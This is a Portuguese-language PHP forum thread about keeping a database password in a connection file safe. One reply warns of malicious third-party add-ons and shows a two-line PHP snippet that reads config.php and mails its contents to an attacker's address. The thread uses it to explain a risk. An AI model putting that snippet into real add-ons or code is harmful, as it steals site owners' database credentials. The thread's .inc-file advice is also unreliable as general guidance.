Ir para conteúdo
Fórum Script Brasil
  • 0

Dúvida sobre a senha da conexão do bd


#Tigre

Pergunta

3 respostass a esta questão

Posts Recomendados

  • 0

Se você quiser proteger essa informação coloque em um arquivo .inc, e coloque como include no php.

depois vá no apache e configure para que ele trate os arquivos .inc.

isso vai fazer com que se alguém tentar ver o arquivo de forma direta o apache vai ocultar o conteúdo do arquivo.

Só um detalhe, o usuário só vai ter acesso ao conteúdo da pagina pegar se ele tiver acesso ao código fonte, pelo navegador ele só vai ver a saída htm, ou seja nada de php.

Editado por itibere
Link para o comentário
Compartilhar em outros sites

  • 0

Bom tem risco sim, dizem que o motivo da invasão no PHPBB.org foi exatamente acesso a senha do bd pelo arquivo de configuração, não sei se isso foi verdade mas isso seria possível.

Porque?

O usuário nunca iria ver pelo navegador o que tem dentro do seu arquivo de conexão (config.php) porque este arquivo é interpretado no servidor, no entanto, se seu sistema tiver hoje ou vir até algum dia algum addon de terceiros, por exemplo TEMPLATES, nada impede do cara fazer algo similar à:

$pegasenha = file_get_contents("config.php");
mail("pegador_de_senha@gmail.com","Mais uma senha de banco",$pegasenha)

E só ficar esperando a senha do seu bd chegar no email dele.

Umas das soluções que você pode adotar é a criptografia desse arquivo usando o ZEND GUARD, ION CUBE ou outros similares.

Link para o comentário
Compartilhar em outros sites

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,1k
    • Posts
      651,8k
×
×
  • Criar Novo...